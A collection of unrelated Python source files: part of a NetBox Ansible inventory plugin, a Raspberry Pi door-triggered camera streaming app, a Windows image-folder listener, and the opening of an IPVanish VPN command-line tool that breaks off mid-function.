# Dictionary of region id to parent region id
self.regions_parent_lookup = dict(
filter(lambda x: x is not None, map(get_region_parent, regions))
)
def refresh_locations_lookup(self):
# Locations were added in v2.11. Return empty lookups for previous versions.
if self.api_version < version.parse("2.11"):
return
url = self.api_endpoint + "/api/dcim/locations/?limit=0"
locations = self.get_resource_list(api_url=url)
self.locations_lookup = dict(
(location["id"], location["slug"]) for location in locations
)
def get_location_parent(location):
# Will fail if location does not have a parent location
try:
return (location["id"], location["parent"]["id"])
except Exception:
return (location["id"], None)
def get_location_site(location):
# Locations MUST be assigned to a site
return (location["id"], location["site"]["id"])
# Dictionary of location id to parent location id
self.locations_parent_lookup = dict(
filter(None, map(get_location_parent, locations))
)
# Location to site lookup
self.locations_site_lookup = dict(map(get_location_site, locations))
def refresh_tenants_lookup(self):
url = self.api_endpoint + "/api/tenancy/tenants/?limit=0"
tenants = self.get_resource_list(api_url=url)
self.tenants_lookup = dict((tenant["id"], tenant["slug"]) for tenant in tenants)
def refresh_racks_lookup(self):
url = self.api_endpoint + "/api/dcim/racks/?limit=0"
racks = self.get_resource_list(api_url=url)
self.racks_lookup = dict((rack["id"], rack["name"]) for rack in racks)
def get_group_for_rack(rack):
try:
return (rack["id"], rack["group"]["id"])
except Exception:
return (rack["id"], None)
def get_role_for_rack(rack):
try:
return (rack["id"], rack["role"]["slug"])
except Exception:
return (rack["id"], None)
self.racks_group_lookup = dict(map(get_group_for_rack, racks))
self.racks_role_lookup = dict(map(get_role_for_rack, racks))
def refresh_rack_groups_lookup(self):
# Locations were added in v2.11 replacing rack groups. Do nothing for 2.11+
if self.api_version >= version.parse("2.11"):
return
url = self.api_endpoint + "/api/dcim/rack-groups/?limit=0"
rack_groups = self.get_resource_list(api_url=url)
self.rack_groups_lookup = dict(
(rack_group["id"], rack_group["slug"]) for rack_group in rack_groups
)
def get_rack_group_parent(rack_group):
try:
return (rack_group["id"], rack_group["parent"]["id"])
except Exception:
return (rack_group["id"], None)
# Dictionary of rack group id to parent rack group id
self.rack_group_parent_lookup = dict(map(get_rack_group_parent, rack_groups))
def refresh_device_roles_lookup(self):
url = self.api_endpoint + "/api/dcim/device-roles/?limit=0"
device_roles = self.get_resource_list(api_url=url)
self.device_roles_lookup = dict(
(device_role["id"], device_role["slug"]) for device_role in device_roles
)
def refresh_device_types_lookup(self):
url = self.api_endpoint + "/api/dcim/device-types/?limit=0"
device_types = self.get_resource_list(api_url=url)
self.device_types_lookup = dict(
(device_type["id"], device_type["slug"]) for device_type in device_types
)
def refresh_manufacturers_lookup(self):
url = self.api_endpoint + "/api/dcim/manufacturers/?limit=0"
manufacturers = self.get_resource_list(api_url=url)
self.manufacturers_lookup = dict(
(manufacturer["id"], manufacturer["slug"]) for manufacturer in manufacturers
)
def refresh_clusters_lookup(self):
url = self.api_endpoint + "/api/virtualization/clusters/?limit=0"
clusters = self.get_resource_list(api_url=url)
def get_cluster_type(cluster):
# Will fail if cluster does not have a type (required property so should always be true)
try:
return (cluster["id"], cluster["type"]["slug"])
except Exception:
return (cluster["id"], None)
def get_cluster_group(cluster):
# Will fail if cluster does not have a group (group is optional)
try:
return (cluster["id"], cluster["group"]["slug"])
except Exception:
return (cluster["id"], None)
self.clusters_type_lookup = dict(map(get_cluster_type, clusters))
self.clusters_group_lookup = dict(map(get_cluster_group, clusters))
def refresh_services(self):
url = self.api_endpoint + "/api/ipam/services/?limit=0"
services = []
if self.fetch_all:
services = self.get_resource_list(url)
else:
device_services = self.get_resource_list_chunked(
api_url=url,
query_key="device_id",
query_values=self.devices_lookup.keys(),
)
vm_services = self.get_resource_list_chunked(
api_url=url,
query_key="virtual_machine_id",
query_values=self.vms_lookup.keys(),
)
services = chain(device_services, vm_services)
# Construct a dictionary of dictionaries, separately for devices and vms.
# Allows looking up services by device id or vm id
self.device_services_lookup = defaultdict(dict)
self.vm_services_lookup = defaultdict(dict)
for service in services:
service_id = service["id"]
if service.get("device"):
self.device_services_lookup[service["device"]["id"]][
service_id
] = service
if service.get("virtual_machine"):
self.vm_services_lookup[service["virtual_machine"]["id"]][
service_id
] = service
def refresh_interfaces(self):
url_device_interfaces = self.api_endpoint + "/api/dcim/interfaces/?limit=0"
url_vm_interfaces = (
self.api_endpoint + "/api/virtualization/interfaces/?limit=0"
)
device_interfaces = []
vm_interfaces = []
if self.fetch_all:
device_interfaces = self.get_resource_list(url_device_interfaces)
vm_interfaces = self.get_resource_list(url_vm_interfaces)
else:
device_interfaces = self.get_resource_list_chunked(
api_url=url_device_interfaces,
query_key="device_id",
query_values=self.devices_lookup.keys(),
)
vm_interfaces = self.get_resource_list_chunked(
api_url=url_vm_interfaces,
query_key="virtual_machine_id",
query_values=self.vms_lookup.keys(),
)
# Construct a dictionary of dictionaries, separately for devices and vms.
# For a given device id or vm id, get a lookup of interface id to interface
# This is because interfaces may be returned multiple times when querying for virtual chassis parent and child in separate queries
self.device_interfaces_lookup = defaultdict(dict)
self.vm_interfaces_lookup = defaultdict(dict)
# /dcim/interfaces gives count_ipaddresses per interface. /virtualization/interfaces does not
self.devices_with_ips = set()
for interface in device_interfaces:
interface_id = interface["id"]
device_id = interface["device"]["id"]
# Check if device_id is actually a device we've fetched, and was not filtered out by query_filters
if device_id not in self.devices_lookup:
continue
# Check if device_id is part of a virtual chasis
# If so, treat its interfaces as actually part of the master
device = self.devices_lookup[device_id]
virtual_chassis_master = self._get_host_virtual_chassis_master(device)
if virtual_chassis_master is not None:
device_id = virtual_chassis_master
self.device_interfaces_lookup[device_id][interface_id] = interface
# Keep track of what devices have interfaces with IPs, so if fetch_all is False we can avoid unnecessary queries
if interface["count_ipaddresses"] > 0:
self.devices_with_ips.add(device_id)
for interface in vm_interfaces:
interface_id = interface["id"]
vm_id = interface["virtual_machine"]["id"]
self.vm_interfaces_lookup[vm_id][interface_id] = interface
# Note: depends on the result of refresh_interfaces for self.devices_with_ips
def refresh_ipaddresses(self):
url = (
self.api_endpoint
+ "/api/ipam/ip-addresses/?limit=0&assigned_to_interface=true"
)
ipaddresses = []
if self.fetch_all:
ipaddresses = self.get_resource_list(url)
else:
device_ips = self.get_resource_list_chunked(
api_url=url,
query_key="device_id",
query_values=list(self.devices_with_ips),
)
vm_ips = self.get_resource_list_chunked(
api_url=url,
query_key="virtual_machine_id",
query_values=self.vms_lookup.keys(),
)
ipaddresses = chain(device_ips, vm_ips)
# Construct a dictionary of lists, to allow looking up ip addresses by interface id
# Note that interface ids share the same namespace for both devices and vms so this is a single dictionary
self.ipaddresses_intf_lookup = defaultdict(dict)
# Construct a dictionary of the IP addresses themselves
self.ipaddresses_lookup = defaultdict(dict)
# NetBox v2.9 and onwards
self.vm_ipaddresses_intf_lookup = defaultdict(dict)
self.vm_ipaddresses_lookup = defaultdict(dict)
self.device_ipaddresses_intf_lookup = defaultdict(dict)
self.device_ipaddresses_lookup = defaultdict(dict)
for ipaddress in ipaddresses:
# As of NetBox v2.9 "assigned_object_x" replaces "interface"
if ipaddress.get("assigned_object_id"):
interface_id = ipaddress["assigned_object_id"]
ip_id = ipaddress["id"]
# We need to copy the ipaddress entry to preserve the original in case caching is used.
ipaddress_copy = ipaddress.copy()
if ipaddress["assigned_object_type"] == "virtualization.vminterface":
self.vm_ipaddresses_lookup[ip_id] = ipaddress_copy
self.vm_ipaddresses_intf_lookup[interface_id][
ip_id
] = ipaddress_copy
else:
self.device_ipaddresses_lookup[ip_id] = ipaddress_copy
self.device_ipaddresses_intf_lookup[interface_id][
ip_id
] = ipaddress_copy # Remove "assigned_object_X" attributes, as that's redundant when ipaddress is added to an interface
del ipaddress_copy["assigned_object_id"]
del ipaddress_copy["assigned_object_type"]
del ipaddress_copy["assigned_object"]
continue
if not ipaddress.get("interface"):
continue
interface_id = ipaddress["interface"]["id"]
ip_id = ipaddress["id"]
# We need to copy the ipaddress entry to preserve the original in case caching is used.
ipaddress_copy = ipaddress.copy()
self.ipaddresses_intf_lookup[interface_id][ip_id] = ipaddress_copy
self.ipaddresses_lookup[ip_id] = ipaddress_copy
# Remove "interface" attribute, as that's redundant when ipaddress is added to an interface
del ipaddress_copy["interface"]
@property
def lookup_processes(self):
lookups = [
self.refresh_sites_lookup,
self.refresh_regions_lookup,
self.refresh_locations_lookup,
self.refresh_tenants_lookup,
self.refresh_racks_lookup,
self.refresh_rack_groups_lookup,
self.refresh_device_roles_lookup,
self.refresh_platforms_lookup,
self.refresh_device_types_lookup,
self.refresh_manufacturers_lookup,
self.refresh_clusters_lookup,
]
if self.interfaces:
lookups.append(self.refresh_interfaces)
if self.prefixes:
lookups.append(self.refresh_prefixes)
if self.services:
lookups.append(self.refresh_services)
return lookups
@property
def lookup_processes_secondary(self):
lookups = []
# IP addresses are needed for either interfaces or dns_name options
if self.interfaces or self.dns_name or self.ansible_host_dns_name:
lookups.append(self.refresh_ipaddresses)
return lookups
def refresh_lookups(self, lookups):
# Exceptions that occur in threads by default are printed to stderr, and ignored by the main thread
# They need to be caught, and raised in the main thread to prevent further execution of this plugin
thread_exceptions = []
def handle_thread_exceptions(lookup):
def wrapper():
try:
lookup()
except Exception as e:
# Save for the main-thread to re-raise
# Also continue to raise on this thread, so the default handler can run to print to stderr
thread_exceptions.append(e)
raise e
return wrapper
thread_list = []
try:
for lookup in lookups:
thread = Thread(target=handle_thread_exceptions(lookup))
thread_list.append(thread)
thread.start()
for thread in thread_list:
thread.join()
# Wait till we've joined all threads before raising any exceptions
for exception in thread_exceptions:
raise exception
finally:
# Avoid retain cycles
thread_exceptions = None
def fetch_api_docs(self):
try:
status = self._fetch_information(self.api_endpoint + "/api/status")
netbox_api_version = ".".join(status["netbox-version"].split(".")[:2])
except Exception:
netbox_api_version = 0
tmp_dir = os.path.split(DEFAULT_LOCAL_TMP)[0]
tmp_file = os.path.join(tmp_dir, "netbox_api_dump.json")
try:
with open(tmp_file) as file:
openapi = json.load(file)
except Exception:
openapi = {}
cached_api_version = openapi.get("info", {}).get("version")
if netbox_api_version != cached_api_version:
openapi = self._fetch_information(
self.api_endpoint + "/api/docs/?format=openapi"
)
with open(tmp_file, "w") as file:
json.dump(openapi, file)
self.api_version = version.parse(openapi["info"]["version"])
self.allowed_device_query_parameters = [
p["name"] for p in openapi["paths"]["/dcim/devices/"]["get"]["parameters"]
]
self.allowed_vm_query_parameters = [
p["name"]
for p in openapi["paths"]["/virtualization/virtual-machines/"]["get"][
"parameters"
]
]
def validate_query_parameter(self, parameter, allowed_query_parameters):
if not (isinstance(parameter, dict) and len(parameter) == 1):
self.display.warning(
"Warning query parameters %s not a dict with a single key." % parameter
)
return None
k = tuple(parameter.keys())[0]
v = tuple(parameter.values())[0]
if not (k in allowed_query_parameters or k.startswith("cf_")):
msg = "Warning: %s not in %s or starting with cf (Custom field)" % (
k,
allowed_query_parameters,
)
self.display.warning(msg=msg)
return None
return k, v
def filter_query_parameters(self, parameters, allowed_query_parameters):
return filter(
lambda parameter: parameter is not None,
# For each element of query_filters, test if it's allowed
map(
# Create a partial function with the device-specific list of query parameters
partial(
self.validate_query_parameter,
allowed_query_parameters=allowed_query_parameters,
),
parameters,
),
)
def refresh_url(self):
device_query_parameters = [("limit", 0)]
vm_query_parameters = [("limit", 0)]
device_url = self.api_endpoint + "/api/dcim/devices/?"
vm_url = self.api_endpoint + "/api/virtualization/virtual-machines/?"
# Add query_filtes to both devices and vms query, if they're valid
if isinstance(self.query_filters, Iterable):
device_query_parameters.extend(
self.filter_query_parameters(
self.query_filters, self.allowed_device_query_parameters
)
)
vm_query_parameters.extend(
self.filter_query_parameters(
self.query_filters, self.allowed_vm_query_parameters
)
)
if isinstance(self.device_query_filters, Iterable):
device_query_parameters.extend(
self.filter_query_parameters(
self.device_query_filters, self.allowed_device_query_parameters
)
)
if isinstance(self.vm_query_filters, Iterable):
vm_query_parameters.extend(
self.filter_query_parameters(
self.vm_query_filters, self.allowed_vm_query_parameters
)
)
# When query_filters is Iterable, and is not empty:
# - If none of the filters are valid for devices, do not fetch any devices
# - If none of the filters are valid for VMs, do not fetch any VMs
# If either device_query_filters or vm_query_filters are set,
# device_query_parameters and vm_query_parameters will have > 1 element so will continue to be requested
if self.query_filters and isinstance(self.query_filters, Iterable):
if len(device_query_parameters) <= 1:
device_url = None
if len(vm_query_parameters) <= 1:
vm_url = None
# Append the parameters to the URLs
if device_url:
device_url = device_url + urlencode(device_query_parameters)
if vm_url:
vm_url = vm_url + urlencode(vm_query_parameters)
# Exclude config_context if not required
if not self.config_context:
if device_url:
device_url = device_url + "&exclude=config_context"
if vm_url:
vm_url = vm_url + "&exclude=config_context"
return device_url, vm_url
def fetch_hosts(self):
device_url, vm_url = self.refresh_url()
self.devices_list = []
self.vms_list = []
if device_url:
self.devices_list = self.get_resource_list(device_url)
if vm_url:
self.vms_list = self.get_resource_list(vm_url)
# Allow looking up devices/vms by their ids
self.devices_lookup = {device["id"]: device for device in self.devices_list}
self.vms_lookup = {vm["id"]: vm for vm in self.vms_list}
# There's nothing that explicitly says if a host is virtual or not - add in a new field
for host in self.devices_list:
host["is_virtual"] = False
for host in self.vms_list:
host["is_virtual"] = True
def extract_name(self, host):
# An host in an Ansible inventory requires an hostname.
# name is an unique but not required attribute for a device in NetBox
# We default to an UUID for hostname in case the name is not set in NetBox
# Use virtual chassis name if set by the user.
if self.virtual_chassis_name and self._get_host_virtual_chassis_master(host):
return host["virtual_chassis"]["name"] or str(uuid.uuid4())
else:
return host["name"] or str(uuid.uuid4())
def generate_group_name(self, grouping, group):
# Check for special case - if group is a boolean, just return grouping name instead
# eg. "is_virtual" - returns true for VMs, should put them in a group named "is_virtual", not "is_virtual_True"
if isinstance(group, bool):
if group:
return grouping
else:
# Don't create the inverse group
return None
# Special case. Extract name from service, which is a hash.
if grouping == "services":
group = group["name"]
grouping = "service"
if grouping == "status":
group = group["value"]
if self.group_names_raw:
return group
else:
return "_".join([grouping, group])
def add_host_to_groups(self, host, hostname):
site_group_by = self._pluralize_group_by("site")
for grouping in self.group_by:
# Don't handle regions here since no hosts are ever added to region groups
# Sites and locations are also specially handled in the main()
if grouping in ["region", site_group_by, "location"]:
continue
if grouping not in self.group_extractors:
raise AnsibleError(
'group_by option "%s" is not valid. Check group_by documentation or check the plurals option. It can determine what group_by options are valid.'
% grouping
)
groups_for_host = self.group_extractors[grouping](host)
if not groups_for_host:
continue
# Make groups_for_host a list if it isn't already
if not isinstance(groups_for_host, list):
groups_for_host = [groups_for_host]
for group_for_host in groups_for_host:
group_name = self.generate_group_name(grouping, group_for_host)
if not group_name:
continue
# Group names may be transformed by the ansible TRANSFORM_INVALID_GROUP_CHARS setting
# add_group returns the actual group name used
transformed_group_name = self.inventory.add_group(group=group_name)
self.inventory.add_host(group=transformed_group_name, host=hostname)
def _add_site_groups(self):
# Map site id to transformed group names
self.site_group_names = dict()
for (
site_id,
site_name,
) in self.sites_lookup_slug.items(): # "Slug" only. Data not used for grouping
site_group_name = self.generate_group_name(
self._pluralize_group_by("site"), site_name
)
# Add the site group to get its transformed name
site_transformed_group_name = self.inventory.add_group(
group=site_group_name
)
self.site_group_names[site_id] = site_transformed_group_name
def _add_region_groups(self):
# Mapping of region id to group name
region_transformed_group_names = self._setup_nested_groups(
"region", self.regions_lookup, self.regions_parent_lookup
)
# Add site groups as children of region groups
for site_id in self.sites_lookup:
region_id = self.sites_region_lookup.get(site_id, None)
if region_id is None:
continue
self.inventory.add_child(
region_transformed_group_names[region_id],
self.site_group_names[site_id],
)
def _add_location_groups(self):
# Mapping of location id to group name
self.location_group_names = self._setup_nested_groups(
"location", self.locations_lookup, self.locations_parent_lookup
)
# Add location to site groups as children
for location_id, location_slug in self.locations_lookup.items():
if self.locations_parent_lookup.get(location_id, None):
# Only top level locations should be children of sites
continue
site_transformed_group_name = self.site_group_names[
self.locations_site_lookup[location_id]
]
self.inventory.add_child(
site_transformed_group_name, self.location_group_names[location_id]
)
def _setup_nested_groups(self, group, lookup, parent_lookup):
# Mapping of id to group name
transformed_group_names = dict()
# Create groups for each object
for obj_id in lookup:
group_name = self.generate_group_name(group, lookup[obj_id])
transformed_group_names[obj_id] = self.inventory.add_group(group=group_name)
# Now that all groups exist, add relationships between them
for obj_id in lookup:
group_name = transformed_group_names[obj_id]
parent_id = parent_lookup.get(obj_id, None)
if parent_id is not None and parent_id in transformed_group_names:
parent_name = transformed_group_names[parent_id]
self.inventory.add_child(parent_name, group_name)
return transformed_group_names
def _fill_host_variables(self, host, hostname):
extracted_primary_ip = self.extract_primary_ip(host=host)
if extracted_primary_ip:
self.inventory.set_variable(hostname, "ansible_host", extracted_primary_ip)
if self.ansible_host_dns_name:
extracted_dns_name = self.extract_dns_name(host=host)
if extracted_dns_name:
self.inventory.set_variable(
hostname, "ansible_host", extracted_dns_name
)
extracted_primary_ip4 = self.extract_primary_ip4(host=host)
if extracted_primary_ip4:
self.inventory.set_variable(hostname, "primary_ip4", extracted_primary_ip4)
extracted_primary_ip6 = self.extract_primary_ip6(host=host)
if extracted_primary_ip6:
self.inventory.set_variable(hostname, "primary_ip6", extracted_primary_ip6)
for attribute, extractor in self.group_extractors.items():
extracted_value = extractor(host)
# Compare with None, not just check for a truth comparison - allow empty arrays, etc to be host vars
if extracted_value is None:
continue
# Special case - all group_by options are single strings, but tag is a list of tags
# Keep the groups named singular "tag_sometag", but host attribute should be "tags":["sometag", "someothertag"]
if attribute == "tag":
attribute = "tags"
if attribute == "region":
attribute = "regions"
if attribute == "location":
attribute = "locations"
if attribute == "rack_group":
attribute = "rack_groups"
# Flatten the dict into separate host vars, if enabled
if isinstance(extracted_value, dict) and (
(attribute == "config_context" and self.flatten_config_context)
or (attribute == "custom_fields" and self.flatten_custom_fields)
or (
attribute == "local_context_data"
and self.flatten_local_context_data
)
):
for key, value in extracted_value.items():
self.inventory.set_variable(hostname, key, value)
else:
self.inventory.set_variable(hostname, attribute, extracted_value)
def _get_host_virtual_chassis_master(self, host):
virtual_chassis = host.get("virtual_chassis", None)
if not virtual_chassis:
return None
master = virtual_chassis.get("master", None)
if not master:
return None
return master.get("id", None)
def main(self):
# Get info about the API - version, allowed query parameters
self.fetch_api_docs()
self.fetch_hosts()
# Interface, and Service lookup will depend on hosts, if option fetch_all is false
self.refresh_lookups(self.lookup_processes)
# Looking up IP Addresses depends on the result of interfaces count_ipaddresses field
# - can skip any device/vm without any IPs
self.refresh_lookups(self.lookup_processes_secondary)
# If we're grouping by regions, hosts are not added to region groups
# If we're grouping by locations, hosts may be added to the site or location
# - the site groups are added as sub-groups of regions
# - the location groups are added as sub-groups of sites
# So, we need to make sure we're also grouping by sites if regions or locations are enabled
site_group_by = self._pluralize_group_by("site")
if (
site_group_by in self.group_by
or "location" in self.group_by
or "region" in self.group_by
):
self._add_site_groups()
# Create groups for locations. Will be a part of site groups.
if "location" in self.group_by and self.api_version >= version.parse("2.11"):
self._add_location_groups()
# Create groups for regions, containing the site groups
if "region" in self.group_by:
self._add_region_groups()
for host in chain(self.devices_list, self.vms_list):
virtual_chassis_master = self._get_host_virtual_chassis_master(host)
if (
virtual_chassis_master is not None
and virtual_chassis_master != host["id"]
):
# Device is part of a virtual chassis, but is not the master
continue
hostname = self.extract_name(host=host)
self.inventory.add_host(host=hostname)
self._fill_host_variables(host=host, hostname=hostname)
strict = self.get_option("strict")
# Composed variables
self._set_composite_vars(
self.get_option("compose"), host, hostname, strict=strict
)
# Complex groups based on jinja2 conditionals, hosts that meet the conditional are added to group
self._add_host_to_composed_groups(
self.get_option("groups"), host, hostname, strict=strict
)
# Create groups based on variable values and add the corresponding hosts to it
self._add_host_to_keyed_groups(
self.get_option("keyed_groups"), host, hostname, strict=strict
)
self.add_host_to_groups(host=host, hostname=hostname)
# Special processing for sites and locations as those groups were already created
if getattr(self, "location_group_names", None) and host.get("location"):
# Add host to location group when host is assigned to the location
self.inventory.add_host(
group=self.location_group_names[host["location"]["id"]],
host=hostname,
)
elif getattr(self, "site_group_names", None) and host.get("site"):
# Add host to site group when host is NOT assigned to a location
self.inventory.add_host(
group=self.site_group_names[host["site"]["id"]],
host=hostname,
)
def parse(self, inventory, loader, path, cache=True):
super(InventoryModule, self).parse(inventory, loader, path)
self._read_config_data(path=path)
self.use_cache = cache
# NetBox access
token = self.get_option("token")
# Handle extra "/" from api_endpoint configuration and trim if necessary, see PR#49943
self.api_endpoint = self.get_option("api_endpoint").strip("/")
self.timeout = self.get_option("timeout")
self.max_uri_length = self.get_option("max_uri_length")
self.validate_certs = self.get_option("validate_certs")
self.follow_redirects = self.get_option("follow_redirects")
self.config_context = self.get_option("config_context")
self.flatten_config_context = self.get_option("flatten_config_context")
self.flatten_local_context_data = self.get_option("flatten_local_context_data")
self.flatten_custom_fields = self.get_option("flatten_custom_fields")
self.plurals = self.get_option("plurals")
self.interfaces = self.get_option("interfaces")
self.services = self.get_option("services")
self.site_data = self.get_option("site_data")
self.prefixes = self.get_option("prefixes")
self.fetch_all = self.get_option("fetch_all")
self.headers = {
"User-Agent": "ansible %s Python %s"
% (ansible_version, python_version.split(" ", maxsplit=1)[0]),
"Content-type": "application/json",
}
self.cert = self.get_option("cert")
self.key = self.get_option("key")
self.ca_path = self.get_option("ca_path")
if token:
self.headers.update({"Authorization": "Token %s" % token})
# Filter and group_by options
self.group_by = self.get_option("group_by")
self.group_names_raw = self.get_option("group_names_raw")
self.query_filters = self.get_option("query_filters")
self.device_query_filters = self.get_option("device_query_filters")
self.vm_query_filters = self.get_option("vm_query_filters")
self.virtual_chassis_name = self.get_option("virtual_chassis_name")
self.dns_name = self.get_option("dns_name")
self.ansible_host_dns_name = self.get_option("ansible_host_dns_name")
self.main()
|
app.py
|
#!/usr/bin/env python
from importlib import import_module
import os
from flask import Flask, render_template, Response
import time
import threading
from random import random
from events import door_event
import RPi.GPIO as GPIO
RECORD = False
open_time_stamp = 0
input_pin_no = 19
GPIO.setmode(GPIO.BOARD)
GPIO.setup(input_pin_no, GPIO.IN)
class GPIO_Monitor(object):
thread = None # background thread that reads frames from camera
def __init__(self):
"""Start the background camera thread if it isn't running yet."""
# start background frame thread
GPIO_Monitor.thread = threading.Thread(target=self._thread)
GPIO_Monitor.thread.start()
@classmethod
def _thread(cls):
"""Camera background thread."""
print('Starting GPIO_Monitor thread.')
'''
r_pre = 0
while True:
print("check GPIO")
ran = random()
threshold = 0.91
if ran >= threshold and r_pre < threshold:
RECORD = True
door_event.set()
print(door_event.isSet())
print("Record")
else:
RECORD = False
door_event.clear()
print(door_event.isSet())
if RECORD == False:
time.sleep(2)
else:
time.sleep(40)
'''
if GPIO.input(input_pin_no)== 1:
print ('Door is opened!')
RECORD = True
door_event.set()
else:
RECORD = False
door_event.clear()
if RECORD == False:
time.sleep(2)
else:
time.sleep(40)
# import camera driver
if os.environ.get('CAMERA'):
Camera = import_module('camera_' + os.environ['CAMERA']).Camera
else:
from camera import Camera
# Raspberry Pi camera module (requires picamera package)
# from camera_pi import Camera
app = Flask(__name__)
@app.route('/')
def index():
print("def index():")
"""Video streaming home page."""
return render_template('index.html')
def gen(camera):
print("def gen(camera):")
"""Video streaming generator function."""
while True:
frame = camera.get_frame()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
@app.route('/video_feed')
def video_feed():
print("def video_feed():")
"""Video streaming route. Put this in the src attribute of an img tag."""
print("Response client")
return Response(gen(camera),
mimetype='multipart/x-mixed-replace; boundary=frame')
if __name__ == '__main__':
#door_event = threading.Event()
gpio_thread = GPIO_Monitor()
camera = Camera()
app.run(host='0.0.0.0', port =9090,threaded=True)
|
fgoImageListener.py
|
import os,cv2,platform
from fgoLogging import getLogger
logger=getLogger('ImageListener')
if platform.system()=='Windows':
import threading,win32con,win32file
class DirListener:
def __init__(self,dir):
self.hDir=win32file.CreateFile(dir,win32con.GENERIC_READ,win32con.FILE_SHARE_READ|win32con.FILE_SHARE_WRITE|win32con.FILE_SHARE_DELETE,None,win32con.OPEN_EXISTING,win32con.FILE_FLAG_BACKUP_SEMANTICS,None)
self.msg=[]
self.lock=threading.Lock()
self.ren=''
def f():
while True:self.add(win32file.ReadDirectoryChangesW(self.hDir,0x1000,False,win32con.FILE_NOTIFY_CHANGE_FILE_NAME|win32con.FILE_NOTIFY_CHANGE_LAST_WRITE,None,None))
threading.Thread(target=f,daemon=True,name=f'DirListener({dir})').start()
def add(self,x):
def onCreated(file):
for i in(i for i in range(len(self.msg)-1,-1,-1)if self.msg[i][1]==file):
if self.msg[i][0]==2:
self.msg[i][0]=3
return
break
self.msg.append([1,file])
def onDeleted(file):
for i in(i for i in range(len(self.msg)-1,-1,-1)if self.msg[i][1]==file):
if self.msg[i][0]==1:
del self.msg[i]
return
if self.msg[i][0]==3:
del self.msg[i]
break
temp=self.msg[i-1][1]
del self.msg[i-1:i+1]
return onDeleted(temp)
self.msg.append([2,file])
def onUpdated(file):
for i in(i for i in range(len(self.msg)-1,-1,-1)if self.msg[i][1]==file):
if self.msg[i][0]==1 or self.msg[i][0]==3:return
if self.msg[i][0]==5:
temp=self.msg[i-1][1]
del self.msg[i-1:i+1]
onDeleted(temp)
return onCreated(file)
break
self.msg.append([3,file])
def onRenamedFrom(file):self.ren=file
def onRenamedTo(file):
for i in range(len(self.msg)-1,-1,-1):
if self.msg[i][1]==file:break
if self.msg[i][1]==self.ren:
if self.msg[i][0]==1:
del self.msg[i]
return onCreated(file)
if self.msg[i][0]==3:
self.msg[i][0]=2
return onCreated(file)
if self.msg[i][0]==5:
self.ren=self.msg[i-1][1]
del self.msg[i-1:i+1]
if self.ren==file:return
break
self.msg+=[[4,self.ren],[5,file]]
with self.lock:[{1:onCreated,2:onDeleted,3:onUpdated,4:onRenamedFrom,5:onRenamedTo}.get(i[0],lambda _:logger.warning(f'Unknown Operate {i}'))(i[1])for i in x]
def get(self):
with self.lock:ans,self.msg=self.msg,[]
return ans
else:
class DirListener:
def __init__(self,dir):pass
def get(self):return[]
class ImageListener(dict):
def __init__(self,path,ends='.png'):
super().__init__((file[:-len(ends)],cv2.imread(path+file))for file in os.listdir(path)if file.endswith(ends))
self.path=path
self.ends=ends
self.listener=DirListener(path)
def flush(self):
lastAction=0
oldName=None
def onCreated(name):self[name]=cv2.imread(self.path+name+self.ends)
def onDeleted(name):del self[name]
def onUpdated(name):self[name]=cv2.imread(self.path+name+self.ends)
def onRenamedFrom(name):
nonlocal oldName
if oldName is not None:del self[oldName]
oldName=name
def onRenamedTo(name):self[name]=self[oldName]if lastAction==4 else cv2.imread(self.path+name+self.ends)
for action,name in((action,file[:-len(self.ends)])for action,file in self.listener.get()if file.endswith(self.ends)):
{1:onCreated,2:onDeleted,3:onUpdated,4:onRenamedFrom,5:onRenamedTo}.get(action,lambda _:None)(name)
logger.info(f'{dict(((1,"Create"),(2,"Delete"),(3,"Update"),(4,"RenameFrom"),(5,"RenameTo"))).get(action,None)} {name}')
lastAction=action
if oldName is not None:del self[oldName]
return self
|
cmd.py
|
import click
import os
import tempfile
import requests
import zipfile
import sys
import glob
import re
import io
import shutil
import traceback
import threading
import bs4
import beautifultable
from .vpn import IpvanishVPN, IpvanishError
SETTINGS = {
"IPVANISH_PATH": os.path.expanduser("~/.config/ipvanish"),
"CONFIG_URL": "https://www.ipvanish.com/software/configs/configs.zip",
"GEOJSON_URL": "https://www.ipvanish.com/api/servers.geojson",
"IPVANISH_ACCOUNT_URL": "https://account.ipvanish.com",
"CONTEXT": {"help_option_names": ["-h", "--help"]},
}
@click.group(context_settings=SETTINGS["CONTEXT"])
def cli():
"""Manage ipvanish from the cli"""
if not os.path.exists(SETTINGS["IPVANISH_PATH"]):
os.mkdir(SETTINGS["IPVANISH_PATH"])
@cli.command(context_settings=SETTINGS["CONTEXT"])
def sync():
"""Sync ipvanish vpn servers config files"""
try:
with tempfile.TemporaryDirectory() as tmpfolder:
try:
r = requests.get(SETTINGS["CONFIG_URL"], stream=True)
r.raise_for_status()
z = zipfile.ZipFile(io.BytesIO(r.content))
z.extractall(tmpfolder)
zipfolder = os.listdir(tmpfolder)
if len(zipfolder) == 0:
raise IpvanishError
else:
shutil.rmtree(
os.path.join(SETTINGS["IPVANISH_PATH"], "configs"), ignore_errors=True,
)
shutil.copytree(tmpfolder, os.path.join(SETTINGS["IPVANISH_PATH"], "configs"))
click.echo(
f"Ipvanish ovpns files downloaded\n{len(zipfolder)-1} servers available"
)
except:
raise IpvanishError("Failed to update vpn config")
except IpvanishError as e:
click.echo(f"[IpvanishError] {e}", file=sys.stderr)
except Exception:
click.echo(traceback.print_exc(), file=sys.stderr)
def check_auth():
with open(os.path.join(SETTINGS["IPVANISH_PATH"], "auth"), "r", encoding="utf-8") as auth:
username = auth.readline().rstrip("\n")
password = auth.readline().rstrip("\n")
with requests.Session() as s:
r = s.get(f"{SETTINGS['IPVANISH_ACCOUNT_URL']}/login")
r.raise_for_status()
soup = bs4.BeautifulSoup(r.content, "html.parser")
token = soup.find(id="clientToken").attrs["value"]
r = s.post(
f"{SETTINGS['IPVANISH_ACCOUNT_URL']}/validate",
data={"username": username, "password": password, "clientToken": token},
)
r.raise_for_status()
@cli.command(context_settings=SETTINGS["CONTEXT"])
@click.option(
"--force",
"-f",
"force",
is_flag=True,
default=False,
help="Override auth credentials if present",
)
def auth(force):
"""Configure ipvanish auth credentials"""
try:
if force or not os.path.exists(os.path.join(SETTINGS["IPVANISH_PATH"], "auth")):
username = click.prompt("Ipvanish's username: ")
password = click.prompt("Ipvanish's password: ", hide_input=True)
with open(os.path.join(SETTINGS["IPVANISH_PATH"], "auth"), "w") as auth:
click.echo(username, file=auth)
click.echo(password, file=auth)
# Try to verify username and password
try:
check_auth()
except requests.exceptions.HTTPError:
raise IpvanishError("Failed to check the auth credentials")
except IpvanishError as e:
